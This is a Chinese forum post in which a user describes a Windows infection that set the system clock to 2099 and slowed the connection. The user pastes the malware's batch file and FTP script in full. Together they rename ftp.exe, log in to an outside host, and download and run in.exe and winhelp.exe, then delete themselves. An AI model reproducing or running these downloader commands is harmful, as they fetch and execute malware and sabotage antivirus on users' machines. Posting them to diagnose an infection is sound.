系统时间被改为2099年,上网速度慢,瑞星无法杀掉,郁闷!!
已经好几天了,瑞星怎么反应这么慢呢
前几天在上网时,有程序请求访问网络,路径C:\WINNT\SYSTEM32\ftp.exe ,拒绝后又出现C:\WINNT\SYSTEM32\sft.exe请求访问网络,紧接着Windows文件保护出现了。我此时没有打开任何程序,估计中毒了。打开C:\WINNT ,发现一个批处理文件begin.bat,出于好奇,用记事本打开后发现以下内容:
set a=星期四 2099-01-01
date=2099-01-01
if exist C:\WINNT\system32\dllcache\ftp.exe ren C:\WINNT\system32\dllcache\ftp.exe sft.exe
if exist C:\WINNT\system32\ftp.exe ren C:\WINNT\system32\ftp.exe sft.exe
sft.exe -s:C:\WINNT\help.dll
if not exist in.exe ftp -s:C:\WINNT\help.dll
in.exe
in.exe
date=%a%
:end
del C:\WINNT\help.dll
del C:\WINNT\BEGIN.BAT
exit
我这时才注意到系统的时间已经被改到2099年去了,急忙打开任务管理器,发现了几个可疑进程cmd.exe ,我没有急着结束进程,用金山反间谍查看路径后发现,cmd.exe确实是系统自带的命令与提示符,但是有一个确指向http://www.webye163.cn/的命令,我分析这是一个恶意网站,经验证果然如此。
批处理中还有一个help.dll,有记事本打开后,发现如下内容:
OPEN www.webye163.cn
loved
get crr.ini in.exe
get crt.ini winhelp.exe
Bye
[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler )
